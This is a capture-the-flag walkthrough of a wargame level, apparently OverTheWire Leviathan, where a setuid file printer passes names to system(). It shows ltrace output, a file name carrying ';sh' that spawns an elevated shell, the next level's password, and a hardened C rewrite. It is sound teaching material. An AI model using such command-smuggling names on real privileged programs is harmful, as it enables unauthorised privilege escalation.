The printfile program prints a file's contents to the screen. However, trying to show the leviathan3 password results in a permission error.
./printfile /etc/leviathan_pass/leviathan3
You cant have that file...
Let's run ltrace again on the password file and see what happens.
ltrace ./printfile /etc/leviathan_pass/leviathan3
__libc_start_main(0x80484f4, 2, -10332, 0x80485d0, 0x8048640 <unfinished ...>
access("/etc/leviathan_pass/leviathan3", 4) = -1
puts("You cant have that file..."You cant have that file...
) = 27
+++ exited (status 1) +++
Let's see what happens if we use printfile correctly.
ltrace ./printfile /tmp/l2/test
__libc_start_main(0x80484f4, 2, -10316, 0x80485d0, 0x8048640 <unfinished ...>
access("/tmp/l2/test", 4) = 0
snprintf("/bin/cat /tmp/l2/test", 511, "/bin/cat %s", "/tmp/l2/test") = 21
system("/bin/cat /tmp/l2/test" <unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 0
+++ exited (status 0) +++
Notice that it first checks the access level with access() and then prints the file by running /bin/cat on the file name through system(). The problem is that the input is not sanitized, so we can pass a file name that makes the shell run additional commands: access() treats the whole argument as a single path, while the shell started by system() parses it as a command line. The first thing that comes to mind is to append a command that reads the password file, but “/” is not allowed in a file name. So we can use “;” to add a second command that spawns a shell.
touch "/tmp/l2/test;sh"
./printfile "/tmp/l2/test;sh"
The shell we spawn runs with elevated permissions, so we can simply read the contents of the password file for the next level.
whoami
leviathan3
cat /etc/leviathan_pass/leviathan3
Ahdiemoo1j
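
A hardened counterpart to the access() + system("/bin/cat %s") pattern seen in the trace, as an added example that is not part of the original write-up or the printfile source. The function names and the sample file under /tmp are assumptions, and it assumes the tool is only meant to print files the invoking user may read.

```c
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* Pattern from the trace: the name is pasted into a string for system().
 * The shell re-parses that string, so ';' in the name ends the cat command. */
int build_shell_command(char *cmd, size_t n, const char *path)
{
    return snprintf(cmd, n, "/bin/cat %s", path);
}

/* Hardened form (hypothetical name): drop to the real UID, then open the path
 * as one literal name and copy its bytes. No shell runs, and the permission
 * check happens inside open(), so there is no access()-then-use gap.
 * Returns the number of bytes copied, or -1 on error. */
long print_file_hardened(const char *path, int out_fd)
{
    char buf[4096];
    long total = 0;
    ssize_t n;
    if (seteuid(getuid()) != 0) return -1;  /* act as the invoking user */
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    while ((n = read(fd, buf, sizeof buf)) > 0) {
        for (ssize_t off = 0; off < n; ) {
            ssize_t w = write(out_fd, buf + off, (size_t)(n - off));
            if (w < 0) { close(fd); return -1; }
            off += w;
        }
        total += n;
    }
    close(fd);
    return n < 0 ? -1 : total;
}

/* Constructed sample: a file whose name contains ";sh" is printed as data. */
long demo(void)
{
    char path[64];
    snprintf(path, sizeof path, "/tmp/printfile-demo-%ld;sh", (long)getpid());
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fputs("hello\n", f);
    fclose(f);
    long copied = print_file_hardened(path, STDOUT_FILENO);
    unlink(path);
    return copied;
}
int main(void) { return demo() == 6 ? 0 : 1; }
```

If an external program must be run, passing the file name as a single argv element to execv() keeps the shell out of the path in the same way.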